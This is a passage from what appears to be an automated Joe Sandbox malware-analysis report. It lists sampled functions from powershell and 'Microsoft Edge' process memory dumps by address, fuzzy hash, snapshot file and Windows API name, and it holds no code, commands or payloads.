                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 67d1617613e612b7a049b31fcb3c0c06bb00aa9b6616606570c7eb9b15762ca9
                                                                                                              • Instruction ID: 7942ddcb7b366def54c675fdc0a42c1b9c7b229ae68d60287c1eb1a1f3edd8da
                                                                                                              • Opcode Fuzzy Hash: 67d1617613e612b7a049b31fcb3c0c06bb00aa9b6616606570c7eb9b15762ca9
                                                                                                              • Instruction Fuzzy Hash: 9001A73020CB0C4FD748EF0CE451AA6B3E0FB89320F10056DE58AC36A1DA32E882CB41
                                                                                                              Function 00007FFD9B889BD8 Relevance: .0, Instructions: 38COMMON
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000012.00000002.2505163950.00007FFD9B880000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B880000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_18_2_7ffd9b880000_powershell.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 225d534b10ffa96b5f6359070a9d0e006bf857a65ebfb589d90f9e322fa7fec6
                                                                                                              • Instruction ID: 91bc1551c8710b57e4f7f9665e8c6eff98507bfce3828f460c85b741521ded42
                                                                                                              • Opcode Fuzzy Hash: 225d534b10ffa96b5f6359070a9d0e006bf857a65ebfb589d90f9e322fa7fec6
                                                                                                              • Instruction Fuzzy Hash: DDF0B43180CA8D8FDB16EF6888695D97FA0EF16311B05029BE498C70B2DB759558CB82

                                                                                                              Non-executed Functions

                                                                                                              Function 00007FFD9B8884FA Relevance: 7.6, Strings: 6, Instructions: 129COMMON
                                                                                                              Download Yara Rule
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000012.00000002.2505163950.00007FFD9B880000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B880000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_18_2_7ffd9b880000_powershell.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID: N_^$N_^$N_^$N_^$N_^$N_^
                                                                                                              • API String ID: 0-4064032852
                                                                                                              • Opcode ID: e53afdd7c223748d644cae29af25bfe42d158d6a8d31a4513917c948fe3a00ad
                                                                                                              • Instruction ID: 2e1bd1268bd560eba14c9b2a851d2a1d1f74bf04cda8759a67b95a2347e7363d
                                                                                                              • Opcode Fuzzy Hash: e53afdd7c223748d644cae29af25bfe42d158d6a8d31a4513917c948fe3a00ad
                                                                                                              • Instruction Fuzzy Hash: 9D31E953E0FED61BE76607694C750982F60FF26A9871E01F3C1E887093FD18B5474282
                                                                                                              Function 00007FFD9B888BFA Relevance: 6.4, Strings: 5, Instructions: 108COMMON
                                                                                                              Download Yara Rule
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000012.00000002.2505163950.00007FFD9B880000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B880000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_18_2_7ffd9b880000_powershell.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID: N_^6$N_^<$N_^F$N_^I$N_^J
                                                                                                              • API String ID: 0-4116931533
                                                                                                              • Opcode ID: 133c3f02191c0a779fe5fdcf772062544d572b98523e8b13a162669be550ebd3
                                                                                                              • Instruction ID: 30ea27bb2e72a318fbb9709187f96eb87b3e53d746551ae2b785aa62a2a43157
                                                                                                              • Opcode Fuzzy Hash: 133c3f02191c0a779fe5fdcf772062544d572b98523e8b13a162669be550ebd3
                                                                                                              • Instruction Fuzzy Hash: C22102B77084269FD30A77EDBC289D87780DB9427A74801B3D368CB543E924608B87C1

                                                                                                              Executed Functions

                                                                                                              Function 00007FFD9B9662D5 Relevance: .4, Instructions: 442COMMON
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000015.00000002.2821473257.00007FFD9B960000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B960000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_21_2_7ffd9b960000_powershell.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 9012d65d5dea175c5b227753ada2422d8d70b49d2f5323578721f4e1f78b2ca9
                                                                                                              • Instruction ID: ec04b99dd20e006337f83dd0461949dd423f26ab51262f4eeb4a39a88b6cf280
                                                                                                              • Opcode Fuzzy Hash: 9012d65d5dea175c5b227753ada2422d8d70b49d2f5323578721f4e1f78b2ca9
                                                                                                              • Instruction Fuzzy Hash: 4DD14532A1FA896FEB65DBA848659B57FE0EF52250B0901FFD05DC70E3DA18A905C341
                                                                                                              Function 00007FFD9B963EC4 Relevance: .4, Instructions: 392COMMON
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000015.00000002.2821473257.00007FFD9B960000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B960000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_21_2_7ffd9b960000_powershell.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: cf4bff8c8c1eac8db07c35acef98593fe60880ec4686bb202e13f9af748e5462
                                                                                                              • Instruction ID: aaaf86e5d944609a74aa4bed26b365c55fc6a1a8b3fd6032e41f7dcfaacf43c7
                                                                                                              • Opcode Fuzzy Hash: cf4bff8c8c1eac8db07c35acef98593fe60880ec4686bb202e13f9af748e5462
                                                                                                              • Instruction Fuzzy Hash: 36A13622E1E6D99FE76697AC58256B07FE1EF56210B1A41FFD088CB1E3D908AD06C341
                                                                                                              Function 00007FFD9B963D13 Relevance: .2, Instructions: 186COMMON
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000015.00000002.2821473257.00007FFD9B960000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B960000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_21_2_7ffd9b960000_powershell.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 432829f3fa568fd9faf13d44f0b1e0ff4f794c4ea538b896e734cac3290eb9ef
                                                                                                              • Instruction ID: aeddfda1f66fca4f5d6a610fd23ed38b85a72f5fa28eb6fbde29557061ffed29
                                                                                                              • Opcode Fuzzy Hash: 432829f3fa568fd9faf13d44f0b1e0ff4f794c4ea538b896e734cac3290eb9ef
                                                                                                              • Instruction Fuzzy Hash: D0516B32B1EA8E9FE7AACA6C547167477D2EF95220B1900BBC05DC75E3DE14EC058351
                                                                                                              Function 00007FFD9B89A2FA Relevance: .2, Instructions: 166COMMON
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000015.00000002.2819882842.00007FFD9B898000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B898000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_21_2_7ffd9b898000_powershell.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 7a70686573baed9dbf63bde157d477a6298504266011fefe12965d5608a9c0fb
                                                                                                              • Instruction ID: 42b4f056ca84240662e0bb17fec2e40a07e0c81edbe9aaaeef1250e8d39f0c3a
                                                                                                              • Opcode Fuzzy Hash: 7a70686573baed9dbf63bde157d477a6298504266011fefe12965d5608a9c0fb
                                                                                                              • Instruction Fuzzy Hash: 00414A76A0E78D4FDB16CBAC98695E43FE0EF56324F0901BBD098C70A3ED246906C751
                                                                                                              Function 00007FFD9B77EE24 Relevance: .1, Instructions: 125COMMON
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000015.00000002.2817875087.00007FFD9B77D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B77D000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_21_2_7ffd9b77d000_powershell.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 93d62ba83e1265cdc3c322883c5cece51faaf7ea15f49dab0e05dedf6e4124ce
                                                                                                              • Instruction ID: 2cbf218fcbbeb93efd19587d0264c0cc1b391bb355bfda7d5284315e8b525c3e
                                                                                                              • Opcode Fuzzy Hash: 93d62ba83e1265cdc3c322883c5cece51faaf7ea15f49dab0e05dedf6e4124ce
                                                                                                              • Instruction Fuzzy Hash: 2741267140EBC84FE7569B2898519523FF0EF57320B1A0ADFD088CB5B3D665A84AC792
                                                                                                              Function 00007FFD9B963D5F Relevance: .1, Instructions: 99COMMON
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000015.00000002.2821473257.00007FFD9B960000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B960000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_21_2_7ffd9b960000_powershell.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 7e1417c22b679b4d13f71c3de63f8d92bd6109c605171e45603a457b08bfafc3
                                                                                                              • Instruction ID: fb13330edf8307a84c68953633b547432a9dd3b29e36efd0ad3ba4c468edf295
                                                                                                              • Opcode Fuzzy Hash: 7e1417c22b679b4d13f71c3de63f8d92bd6109c605171e45603a457b08bfafc3
                                                                                                              • Instruction Fuzzy Hash: 74212722B2F98FAFE7B6CA6C447153467D1EF51210B5A00BAC05DC75F2DE28EC058311
                                                                                                              Function 00007FFD9B96408C Relevance: .1, Instructions: 66COMMON
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000015.00000002.2821473257.00007FFD9B960000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B960000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_21_2_7ffd9b960000_powershell.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: c57469b41a942996330fe39d6bb3fe91f0ca111f541a408531b5dc4cc31c1add
                                                                                                              • Instruction ID: 79da1b4ccaa8a213826ff5f117a19d474a699fffd850a96ac24d42f4d917edab
                                                                                                              • Opcode Fuzzy Hash: c57469b41a942996330fe39d6bb3fe91f0ca111f541a408531b5dc4cc31c1add
                                                                                                              • Instruction Fuzzy Hash: 47110132E2F5999FEBB4DAE8846167477D1EF11220B0A00BED06DC72A6D919AC008341
                                                                                                              Function 00007FFD9B9664E3 Relevance: .1, Instructions: 61COMMON
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000015.00000002.2821473257.00007FFD9B960000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B960000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_21_2_7ffd9b960000_powershell.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: d289b56a851c19ad1ff7b51f3d7f067325103c7fa5b70cacff06ef254258479c
                                                                                                              • Instruction ID: f6295fb1d35ec0a3645c5a59229acbccaa22209441143c1a7e52cd5242f4f5d2
                                                                                                              • Opcode Fuzzy Hash: d289b56a851c19ad1ff7b51f3d7f067325103c7fa5b70cacff06ef254258479c
                                                                                                              • Instruction Fuzzy Hash: 0911C232B1E6499FEB64DA9890A59B8BBE1EF58310F5900BFC05DD7097DE2AA805C350
                                                                                                              Function 00007FFD9B8933B5 Relevance: .0, Instructions: 49COMMON
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000015.00000002.2819882842.00007FFD9B890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B890000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_21_2_7ffd9b890000_powershell.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 08da065673a25bdeb927b4c2f952ba14616e05d90be0e25124618a69153761d0
                                                                                                              • Instruction ID: 790f53b18bf535405e1566ca4fc67868e3ace26fd97990e01e1bad52e7daa871
                                                                                                              • Opcode Fuzzy Hash: 08da065673a25bdeb927b4c2f952ba14616e05d90be0e25124618a69153761d0
                                                                                                              • Instruction Fuzzy Hash: 7401A73020CB0C4FDB48EF0CE451AA6B7E0FB89320F10056DE58AC36A1DA32E882CB41
                                                                                                              Function 00007FFD9B899BD8 Relevance: .0, Instructions: 38COMMON
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000015.00000002.2819882842.00007FFD9B898000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B898000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_21_2_7ffd9b898000_powershell.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 1b3ea643f17a63e63a1b7d5800bf695a9227f7625860bda10ae9635cfdad58f6
                                                                                                              • Instruction ID: 0314c12138fd19f11714d0f4204d7559e7e9e4364f424aa80ec3c132048589b3
                                                                                                              • Opcode Fuzzy Hash: 1b3ea643f17a63e63a1b7d5800bf695a9227f7625860bda10ae9635cfdad58f6
                                                                                                              • Instruction Fuzzy Hash: E3F0243080CA8D8FDB06EF6888695D57FA0EF16311B05029BE448C71B2DB649598CBC2

                                                                                                              Non-executed Functions

                                                                                                              Function 00007FFD9B898BFA Relevance: 7.6, Strings: 6, Instructions: 93COMMON
                                                                                                              Download Yara Rule
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000015.00000002.2819882842.00007FFD9B898000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B898000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_21_2_7ffd9b898000_powershell.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID: M_^=$M_^@$M_^T$M_^U$M_^W$M_^Y
                                                                                                              • API String ID: 0-134851635
                                                                                                              • Opcode ID: 157a0409ef14b084e0ff994dfc99da5b43f7d84fb73b8e20bd1e2fcffa3d466b
                                                                                                              • Instruction ID: bfefcb82d6efc08166ea6a51294a2a5ba2bcff1f56c9a4cfe65288ae78aacc0f
                                                                                                              • Opcode Fuzzy Hash: 157a0409ef14b084e0ff994dfc99da5b43f7d84fb73b8e20bd1e2fcffa3d466b
                                                                                                              • Instruction Fuzzy Hash: 4D2165B3714529DAD70A36ADBC199E83780EF9137638603F3D265CB183FC58A48799C0
                                                                                                              Function 00007FFD9B8984FA Relevance: 6.3, Strings: 5, Instructions: 96COMMON
                                                                                                              Download Yara Rule
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000015.00000002.2819882842.00007FFD9B898000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B898000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_21_2_7ffd9b898000_powershell.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID: M_^$M_^$M_^$M_^$M_^
                                                                                                              • API String ID: 0-679677686
                                                                                                              • Opcode ID: 40fbfa7babff5c570c95ef64fa6377b43ccbc46bf21d0eea3abe54241660c584
                                                                                                              • Instruction ID: 65d6d0e121c8e014a3c3c0cf11cf56459ef5460626309968a3ab4aa9da65387b
                                                                                                              • Opcode Fuzzy Hash: 40fbfa7babff5c570c95ef64fa6377b43ccbc46bf21d0eea3abe54241660c584
                                                                                                              • Instruction Fuzzy Hash: 3621E593F0BD9757EB66076E88A94996F90FF55B9875A03B2C0E887093BD04740B4181

                                                                                                              Execution Graph

                                                                                                              Execution Coverage:19.9%
                                                                                                              Dynamic/Decrypted Code Coverage:100%
                                                                                                              Signature Coverage:0%
                                                                                                              Total number of Nodes:14
                                                                                                              Total number of Limit Nodes:1
                                                                                                              execution_graph 14729 7ffd9b89d4f9 14731 7ffd9b89d50f 14729->14731 14730 7ffd9b89d552 14731->14730 14732 7ffd9b89d67d CreateFileW 14731->14732 14733 7ffd9b89d6de 14732->14733 14734 7ffd9b8945ea 14735 7ffd9b8df9c0 GetFileType 14734->14735 14737 7ffd9b8dfa44 14735->14737 14738 7ffd9b89d810 14739 7ffd9b89d819 SetConsoleMode 14738->14739 14741 7ffd9b89d8b9 14739->14741 14742 7ffd9b89d711 14743 7ffd9b89d71f GetConsoleMode 14742->14743 14745 7ffd9b89d7d4 14743->14745

                                                                                                              Executed Functions

                                                                                                              Function 00007FFD9B89D4F9 Relevance: 1.7, APIs: 1, Instructions: 246fileCOMMON
                                                                                                              Download Yara Rule

                                                                                                              Control-flow Graph

                                                                                                              • Executed
                                                                                                              • Not Executed
                                                                                                              control_flow_graph 1298 7ffd9b89d4f9-7ffd9b89d550 call 7ffd9b8945d0 1302 7ffd9b89d552-7ffd9b89d580 1298->1302 1303 7ffd9b89d581-7ffd9b89d5a3 1298->1303 1308 7ffd9b89d5a4-7ffd9b89d5d5 1303->1308 1312 7ffd9b89d5d7-7ffd9b89d673 1308->1312 1318 7ffd9b89d675-7ffd9b89d67a 1312->1318 1319 7ffd9b89d67d-7ffd9b89d6dc CreateFileW 1312->1319 1318->1319 1320 7ffd9b89d6de 1319->1320 1321 7ffd9b89d6e4-7ffd9b89d70c 1319->1321 1320->1321
                                                                                                              APIs
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000019.00000002.3224451219.00007FFD9B890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B890000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_25_2_7ffd9b890000_Microsoft Edge.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: CreateFile
                                                                                                              • String ID:
                                                                                                              • API String ID: 823142352-0
                                                                                                              • Opcode ID: fae9de3a29e18544769aa4d68f62264835cc30ee73f6bb10d437976e43d44b61
                                                                                                              • Instruction ID: 1c0c54051fcdb5d9ae1d0bbed37375be8423fadce4fb75d5bbd1d89dc5c48623
                                                                                                              • Opcode Fuzzy Hash: fae9de3a29e18544769aa4d68f62264835cc30ee73f6bb10d437976e43d44b61
                                                                                                              • Instruction Fuzzy Hash: 7371E571A0DA494FDB59DB6C98596A97BE0FF59320F0402AFE04DD72A2DF24A8028781
                                                                                                              Function 00007FFD9B8945DA Relevance: 1.6, APIs: 1, Instructions: 130fileCOMMON
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000019.00000002.3224451219.00007FFD9B890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B890000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_25_2_7ffd9b890000_Microsoft Edge.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: CreateFile
                                                                                                              • String ID:
                                                                                                              • API String ID: 823142352-0
                                                                                                              • Opcode ID: cb69dc47c7f78f75b5c148b7d6e675c9e478f00083d6c407a47a29b718ff1f4b
                                                                                                              • Instruction ID: 9304c2bde13c3696d79278d47bdd64e6a7feb50c98481a4ad2fe26088b3e94a8
                                                                                                              • Opcode Fuzzy Hash: cb69dc47c7f78f75b5c148b7d6e675c9e478f00083d6c407a47a29b718ff1f4b
                                                                                                              • Instruction Fuzzy Hash: AA31837191CA1C9FDB58EF58D845AF97BE0FB69321F10422EE04EE3251DB71A8418BC5
                                                                                                              Function 00007FFD9B89D711 Relevance: 1.6, APIs: 1, Instructions: 120COMMON
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000019.00000002.3224451219.00007FFD9B890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B890000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_25_2_7ffd9b890000_Microsoft Edge.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: ConsoleMode
                                                                                                              • String ID:
                                                                                                              • API String ID: 4145635619-0
                                                                                                              • Opcode ID: 9ba8415c0a62203c09f686df73be1eee22ea5c5b510ca313b0dd1808ee2258cc
                                                                                                              • Instruction ID: a186a6e11c9592676c419554b0a01a3b050a31370ed2a8aca56d58ab6221076f
                                                                                                              • Opcode Fuzzy Hash: 9ba8415c0a62203c09f686df73be1eee22ea5c5b510ca313b0dd1808ee2258cc
                                                                                                              • Instruction Fuzzy Hash: 8C313630A0C65C8FCB58DF98D845BF97BE0EF5A320F0441AAD009D7296DB74A842CB91
                                                                                                              Function 00007FFD9B89D810 Relevance: 1.6, APIs: 1, Instructions: 107COMMON
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000019.00000002.3224451219.00007FFD9B890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B890000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_25_2_7ffd9b890000_Microsoft Edge.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: ConsoleMode
                                                                                                              • String ID:
                                                                                                              • API String ID: 4145635619-0
                                                                                                              • Opcode ID: 5e0dd68faf92441e7e1aacb76fa7db37b8e6f9c64079b65a29116727e6590b6d
                                                                                                              • Instruction ID: c99c38cc934ff7731f6bead5eb0e1fc2824d58dba8de167d7cb05e17b38591fa
                                                                                                              • Opcode Fuzzy Hash: 5e0dd68faf92441e7e1aacb76fa7db37b8e6f9c64079b65a29116727e6590b6d
                                                                                                              • Instruction Fuzzy Hash: 1831F630A0C60C8FEB58DF98D8467F97BE0EF56321F04016ED449D7292DA74A856CB91
                                                                                                              Function 00007FFD9B89469A Relevance: 1.6, APIs: 1, Instructions: 103COMMON
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000019.00000002.3224451219.00007FFD9B890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B890000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_25_2_7ffd9b890000_Microsoft Edge.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: ConsoleMode
                                                                                                              • String ID:
                                                                                                              • API String ID: 4145635619-0
                                                                                                              • Opcode ID: d62ceef29a5aa86db10fb9ad0c3bef94536fdcdf730c046afe0401bf5e4f2017
                                                                                                              • Instruction ID: 051ddbcf1dbf6a0a4ea4c7f4226418e8e98ca1d0e3bebbce108df820f63f822c
                                                                                                              • Opcode Fuzzy Hash: d62ceef29a5aa86db10fb9ad0c3bef94536fdcdf730c046afe0401bf5e4f2017
                                                                                                              • Instruction Fuzzy Hash: 4F21D031A08A1C8FDB58EF98D849BF9BBE1EF59320F04416AD409D3256DB70A8428B91
                                                                                                              Function 00007FFD9B8946BA Relevance: 1.6, APIs: 1, Instructions: 97COMMON
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000019.00000002.3224451219.00007FFD9B890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B890000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_25_2_7ffd9b890000_Microsoft Edge.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: ConsoleMode
                                                                                                              • String ID:
                                                                                                              • API String ID: 4145635619-0
                                                                                                              • Opcode ID: 28c0e50b83a7e9e91cd853c4a9aa9aa7452b48743630dcde97a05a58779ec419
                                                                                                              • Instruction ID: 88e3a77e4c7cc07f5cfbcff6acc188a8f689eb44a509babc85370a4d873b054a
                                                                                                              • Opcode Fuzzy Hash: 28c0e50b83a7e9e91cd853c4a9aa9aa7452b48743630dcde97a05a58779ec419
                                                                                                              • Instruction Fuzzy Hash: 1721E531A0C61C8FDF58EF98D8467F97BE0EB69321F10016ED44ED3292DA74A846CB91
                                                                                                              Function 00007FFD9B8945EA Relevance: 1.6, APIs: 1, Instructions: 91COMMON
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000019.00000002.3224451219.00007FFD9B890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B890000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_25_2_7ffd9b890000_Microsoft Edge.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: FileType
                                                                                                              • String ID:
                                                                                                              • API String ID: 3081899298-0
                                                                                                              • Opcode ID: 98482bb40e4ede0fb3e91c86a16e6ed594005c439e095d591823ad76cbb9ba51
                                                                                                              • Instruction ID: f01f248db7698828e054c718dcf2addccd441b8209372c06a91773c172dd2e4f
                                                                                                              • Opcode Fuzzy Hash: 98482bb40e4ede0fb3e91c86a16e6ed594005c439e095d591823ad76cbb9ba51
                                                                                                              • Instruction Fuzzy Hash: 5C219271A08A0C9FDB58DB98D845BF9B7E0FB99321F10422ED04ED3651DB71A856CB81
                                                                                                              Function 00007FFD9B96166B Relevance: .4, Instructions: 421COMMON
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000019.00000002.3231926175.00007FFD9B960000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B960000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_25_2_7ffd9b960000_Microsoft Edge.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 23dc702ce78e3d6dee08ee0adaaedc2c3aada546d595122a579191dfa38b0507
                                                                                                              • Instruction ID: 2accd72fd1b009ae9c4f4b9e36a1d26a93fd88e8a9ab4b7f458756a74b9c8067
                                                                                                              • Opcode Fuzzy Hash: 23dc702ce78e3d6dee08ee0adaaedc2c3aada546d595122a579191dfa38b0507
                                                                                                              • Instruction Fuzzy Hash: 4CC16A22B1EA995FE7A9976858352783BE1EF82314B4901FFD08DC71F3ED18AC068341
                                                                                                              Function 00007FFD9B9612F9 Relevance: .4, Instructions: 365COMMON
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000019.00000002.3231926175.00007FFD9B960000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B960000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_25_2_7ffd9b960000_Microsoft Edge.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 9308a220042204c3ea1c70369d60e8acfa8d7f702bf8c9c8535b5c7007e0c66d
                                                                                                              • Instruction ID: 62c05ea5571449c92682e1b0b01b47c5b558d07823fa7a5690d0e71566ac89d4
                                                                                                              • Opcode Fuzzy Hash: 9308a220042204c3ea1c70369d60e8acfa8d7f702bf8c9c8535b5c7007e0c66d
                                                                                                              • Instruction Fuzzy Hash: 62A18B32A1EB9C5FE769DB6848655B93BE1EF86224B0401BFD09DC71A3EE14AD06C341
                                                                                                              Function 00007FFD9B9617FD Relevance: .1, Instructions: 90COMMON
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000019.00000002.3231926175.00007FFD9B960000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B960000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_25_2_7ffd9b960000_Microsoft Edge.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 12e40afc3546adecb14234b77a20c3be823946eb3f8b4f6b9f32db471ebed29d
                                                                                                              • Instruction ID: a62701dd44da776d1d514e744b4ae3cef77f501ab384767ae53b13bdf1952512
                                                                                                              • Opcode Fuzzy Hash: 12e40afc3546adecb14234b77a20c3be823946eb3f8b4f6b9f32db471ebed29d
                                                                                                              • Instruction Fuzzy Hash: A3213A13F2FA6D6FE3B993AC283107827C2DF8575474A11BAE45CC31E7ED286D064185